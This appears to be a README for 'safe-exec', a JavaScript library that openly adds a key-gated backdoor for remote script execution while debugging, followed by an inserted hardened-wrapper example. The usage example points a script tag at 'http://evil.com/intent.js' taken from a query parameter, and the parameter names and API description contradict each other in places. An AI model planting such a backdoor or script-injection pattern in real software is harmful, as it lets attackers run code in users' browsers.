# safe-exec

Controlled remote code execution. Great for debugging on a live server. Extremely dangerous for everything else.

Uses RSA key pairs.
## Installation

Via npm:

```sh
npm install safe-exec
```

Via Bower:

```sh
bower install safe-exec
```

## Test

```sh
make test
```
## Example

Visit the page with some very specific query parameters:

- `publicKey` - plain text passphrase. WARNING: Persisted in session.
- `message` - optional value of any kind.

```
http://example.com?privateKey=foobar&message=http://evil.com/intent.js
```
Then somewhere in your code:

```js
import { exec } from 'safe-exec'; // import form assumed; see the API section below

// Runs when the key material in the query string validates; `message` is the
// value of the `message` query parameter.
const success = (message) => {
  let victim = document.querySelector('script[src="foobar.js"]');
  victim.setAttribute('src', message);
};

// Runs when validation fails or an error is thrown.
const failure = (error) => {
  console.log(error);
};

exec(location.search, 'somereallylongcipher', sessionStorage, success, failure);
```
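The callback above repoints a script tag at whatever `message` says, which is exactly the part a defender would want to constrain. The following is an added example and is not part of safe-exec: it wraps the success callback so only an `https` URL from an explicitly allowlisted debug origin is accepted, and it gates the call to `exec` behind a build-time check so the hook is never wired up in production. The allowlisted origin, the `SAFE_EXEC_DEBUG` environment variable and the fake `document` are assumptions made for this example.

```javascript
// Added example, not part of safe-exec: a hardened `success` callback and a
// build-time guard. The allowlisted origin and the env variable names are
// assumptions for this example.
const ALLOWED_DEBUG_ORIGINS = new Set(['https://debug.example.com']);

// Only accept an https URL whose origin is explicitly allowlisted, so the
// `message` parameter cannot point the script tag at an arbitrary host.
function isAllowedScriptUrl(message) {
  let url;
  try {
    url = new URL(String(message));
  } catch (e) {
    return false; // not a parseable absolute URL
  }
  return url.protocol === 'https:' && ALLOWED_DEBUG_ORIGINS.has(url.origin);
}

// Never enable the hook in a production build, and require an explicit opt-in
// flag even outside production.
function shouldEnableExec(env) {
  return env.NODE_ENV !== 'production' && env.SAFE_EXEC_DEBUG === '1';
}

// Build a success callback bound to a document-like object. Returns true only
// when a script element was actually repointed.
function makeSuccess(doc) {
  return (message) => {
    if (!isAllowedScriptUrl(message)) {
      return false;
    }
    const victim = doc.querySelector('script[src="foobar.js"]');
    if (!victim) {
      return false;
    }
    victim.setAttribute('src', message);
    return true;
  };
}

// Call exec() only when the guard allows it; `exec` is injected so the wiring
// can be exercised without the library. Returns false when the hook is off.
function wireUp(env, exec, search, storage, doc, publicKey) {
  if (!shouldEnableExec(env)) {
    return false;
  }
  const failure = (error) => console.log(error);
  return exec(search, publicKey, storage, makeSuccess(doc), failure);
}

// Constructed stand-in for the DOM so the example runs outside a browser.
function makeFakeDocument() {
  const script = {
    attrs: { src: 'foobar.js' },
    setAttribute(name, value) { this.attrs[name] = value; },
  };
  return {
    script,
    querySelector(selector) {
      return selector === 'script[src="foobar.js"]' ? script : null;
    },
  };
}

// Usage: the guarded callback accepts the allowlisted debug origin and refuses
// everything else, including the URL from the README example.
const doc = makeFakeDocument();
const success = makeSuccess(doc);
const accepted = success('https://debug.example.com/patch.js'); // true
const rejected = success('http://evil.com/intent.js');          // false
```

With this wrapper the passphrase still lands in `sessionStorage`, so the guard in `shouldEnableExec` is what keeps the whole code path out of a production bundle; the origin allowlist only limits the damage if it is shipped by mistake.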
## FAQ

**Wow this is a great idea! Should I use this in production?**

You should never use this in a production environment. This library creates an intentional backdoor for your front-end, which is a huge security risk.

**Why would you intentionally build a backdoor?**

This is useful for environments that are difficult to replicate on your local machine. It helps to speed up development and debugging.
## API

### `exec(search, publicKey, sessionStorage, cb)` → `boolean`

Executes code if a valid public/private key pair is present.

- `search` - should just be `window.location.search`.
- `publicKey` - any valid RSA public key.
- `sessionStorage` - pass a reference to DOM `sessionStorage` to persist execution across the session.
- `success` - callback `message => ...` where code execution is defined.
- `error` - callback `error => ...` giving the object where the error occurred.

Returns `true` on success and `false` on failure.
## License

MIT

pori.io · GitHub @pori · Twitter @pori_alex